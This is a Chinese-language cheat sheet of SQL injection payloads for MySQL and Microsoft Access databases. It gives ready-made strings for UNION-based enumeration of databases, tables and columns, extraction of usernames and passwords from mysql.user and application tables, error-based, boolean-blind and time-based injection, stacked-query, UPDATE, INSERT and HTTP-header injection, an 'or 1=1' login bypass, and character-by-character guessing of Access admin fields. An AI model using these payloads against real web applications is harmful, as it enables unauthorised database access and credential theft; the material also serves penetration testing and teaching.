========MySQL数据库
SQL查询语句
- 获取数据库信息
select user(),version(),database(),@@datadir,@@version_compile_os
- 获取数据库名字
select schema_name from schemata;
select schema_name from information_schema.schemata;
select group_concat(distinct table_schema) from tables;
select group_concat(distinct table_schema) from information_schema.tables;
- 获取数据库表名字
select group_concat(distinct table_name) from information_schema.tables where table_schema='mysql';
select group_concat(distinct table_name) from information_schema.tables where table_schema=database();
- 获取字段名
select group_concat(distinct column_name) from information_schema.columns where table_schema='mysql' and table_name='user';
- 获取字段内容
select concat(0x3a,user,0x3a,password,0x3a) from mysql.user;
联合查询注入
判断注入(略)、判断字段(列)数
union select
order by
查看回显位
union select 1,2,3,4,……
获取数据库信息,假设回显位为1,2
union select version(),user(),3%23
获取数据库名字
union select null,schema_name,null from information_schema.schemata%23
union select 1,schema_name,3 from information_schema.schemata%23
union select null,group_concat(schema_name),null from information_schema.schemata%23
获取数据库表
union select null,group_concat(table_name),null from information_schema.tables%23//获取所有数据库表
union select null,group_concat(table_name),null from information_schema.tables where table_schema='zaqtest'%23//获取指定的数据库zaqtest的表
union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()%23//获取当前web系统的数据库的表
获取users字段字段名
union select null,group_concat(column_name),null from information_schema.columns where table_schema=database() and table_name='users'%23
获取字段内容
union select null,concat(0x3a,username,0x3a,password,0x3a),null from zaqtest.users%23
报错注入
and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
and exp(~(select * from(select user())a))
(!(select * from (select user())x) - ~0)
布尔盲注
and if(mid(user(),1,1),1,0)
and if(mid(user(),1,1)='r',1,0)
and (select user() like 'r%' from tables limit 0,1)
时间盲注
and if(1=1,sleep(3),1)
堆叠查询
okmmk';update Zaq_member set email=(select user()) WHERE username='okmmk';
update注入
update Zaq_member set email='',email=(select user())#' where username = 'okmmk'
update Zaq_member set email='',email=(select user()) where username = 'okmmk' 1#' where username = 'okmmk'
insert 注入
insert into test(username,password) values('1' and (updatexml(1,concat(0x7e,user(),0x7e),1))and '','234');
http头注入
在HTTP头中这几个是常见存在注入点的地方:
X-Forwarded-For
Host
User-agent
Referer
X-Forwarded-For:1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and 'A
insert into Zaq_log(ip,url,referer,ua)values('1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '','http://127.0.0.1/web_sql/http-sql/index.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0')
万能密码
or 1=1
========ACCESS数据库
1.报错信息:
and exists(select * from MSysAccessObiects)
and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0
2.猜表:
and exists(select * from tables) #返回正常说明表存在!
3.猜字段和字段内容
(1)猜字段数
order by 5
union select 1,2,3,4...
接着猜字段数: order by 3
假设猜到字段数是3 然后查看回显位: union select 1,2,3
(2)猜字段名
先猜字段名:
and exists(select username from admin) #返回正常表示 username 存在
and exists(select password from admin) #返回正常表示 password 存在
二分法猜字段长度和内容:
猜长度:
and (select top 1 len(username) from admin)>30 //error
and (select top 1 len(username) from admin)<30 //True,接着二分法
猜内容:
and (select top 1 ascii(mid(username,1,1))>97 from admin) //true
and (select top 1 ascii(mid(username,1,1))>114 from admin) //error
证明admin表的第一个记录的username字段的第一个字母的ASCII码
